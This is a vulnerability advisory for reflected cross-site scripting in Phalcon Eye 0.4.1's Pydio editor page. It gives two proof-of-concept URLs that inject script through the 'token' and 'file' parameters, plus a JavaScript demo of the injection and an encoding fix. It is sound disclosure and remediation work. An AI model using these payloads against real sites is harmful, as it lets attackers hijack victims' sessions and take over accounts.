Product: Phalcon Eye
Vendor: Phalcon (https://phalconphp.com/)
Vulnerable Version: 0.4.1 and probably prior
Tested Version: 0.4.1
Author: ADLab of Venustech
Advisory Details:
I have discovered multiple reflected Cross-Site Scripting (XSS) vulnerabilities in Phalcon Eye. An attacker who gets a victim to open a crafted link can run arbitrary script in the victim's browser in the context of the vulnerable site, and so act with that user's session, for example to add, modify or delete information in the application's database or, if the victim is an administrator, to gain control over the application.
The vulnerability exists due to insufficient filtering of user-supplied data in multiple HTTP GET parameters (at least "token" and "file", as shown below) passed to the "phalconeye-master/phalconeye-master/public/external/pydio/plugins/editor.webodf/frame.php" URL. An attacker could execute arbitrary HTML and script code in the browser in the context of the vulnerable website.
The exploitation examples below use the "alert()" JavaScript function to show a pop-up message box. The payload shape (a closing quote, then "</script>", then a fresh "<script>" element) targets a value that is reflected inside an inline script block: the HTML parser ends a script element at the first "</script>" it sees regardless of JavaScript quoting, so the injected second script element runs even if the first one no longer parses.
(1)
http://localhost/testcmsofgithub/phalconeye-master/phalconeye-master/public/external/pydio/plugins/editor.webodf/frame.php?token=%22%22);}%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3Efunction%20nopfun(){//
(2)
http://localhost/testcmsofgithub/phalconeye-master/phalconeye-master/public/external/pydio/plugins/editor.webodf/frame.php?file=%22%22);}%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3Efunction%20nopfun(){//
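The following is an added example, not code from Phalcon Eye or Pydio, that reproduces the injection pattern behind PoCs (1) and (2) and shows a fix. The template inside renderVulnerable() is an assumption standing in for frame.php (the advisory does not reproduce its source); the decoded parameter is taken verbatim from the PoC URLs.

```javascript
// Added example (not Phalcon Eye / Pydio code). Models a GET parameter that is
// reflected into an inline <script> string literal, as the PoC payload assumes.

// Query-string value from PoC (1)/(2), still URL-encoded.
const POC_PARAM =
  '%22%22);}%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3Efunction%20nopfun(){//';

// What the PHP side sees after the query string is decoded.
function decodeParam(encoded) {
  return decodeURIComponent(encoded);
}

// ASSUMED vulnerable rendering: the parameter is concatenated into a JS string
// literal with no encoding (the bug class the advisory describes).
function renderVulnerable(value) {
  return '<html><body><script>\n' +
         'var token = "' + value + '";\n' +
         'loadDocument(token);\n' +
         '</script></body></html>';
}

// Hardened rendering: JSON-encode the value (quotes, backslashes, newlines) and
// additionally escape '<' and '>' as \uXXXX so the HTML tokenizer can never see
// "</script>" inside the literal. JSON quoting alone would NOT stop this PoC.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

function renderSafe(value) {
  return '<html><body><script>\n' +
         'var token = ' + jsStringLiteral(value) + ';\n' +
         'loadDocument(token);\n' +
         '</script></body></html>';
}

// Minimal model of the HTML tokenizer's "script data" state: inside <script> the
// browser does not parse JavaScript, it scans for the next "</script" (case-
// insensitive) and ends the element there, whatever quotes or braces are open.
// Returns the raw body of each <script> element in document order.
function extractScriptBodies(html) {
  const bodies = [];
  const lower = html.toLowerCase();
  let pos = 0;
  for (;;) {
    const open = lower.indexOf('<script', pos);
    if (open === -1) break;
    const bodyStart = lower.indexOf('>', open);
    if (bodyStart === -1) break;
    const close = lower.indexOf('</script', bodyStart + 1);
    if (close === -1) { bodies.push(html.slice(bodyStart + 1)); break; }
    bodies.push(html.slice(bodyStart + 1, close));
    pos = close + '</script'.length;
  }
  return bodies;
}

// Reproduce the PoC: the vulnerable page gains a second script element whose body
// is exactly "alert(1);"; the hardened page keeps a single script element.
function demo() {
  const value = decodeParam(POC_PARAM);
  const vulnScripts = extractScriptBodies(renderVulnerable(value)).map(s => s.trim());
  const safeScripts = extractScriptBodies(renderSafe(value)).map(s => s.trim());
  return { value, vulnScripts, safeScripts };
}

if (typeof require !== 'undefined' && require.main === module) {
  const r = demo();
  console.log('decoded parameter:', r.value);
  console.log('script elements in vulnerable page:', r.vulnScripts.length);
  console.log('injected element body:', r.vulnScripts[1]);
  console.log('script elements in hardened page:', r.safeScripts.length);
}
```

The check to apply when auditing a page like frame.php is the one extractScriptBodies() models: any user-controlled value that lands inside a script element must be encoded so that it cannot contain "</script" (or "<!--") after output encoding, and escaping only the quote character does not achieve that.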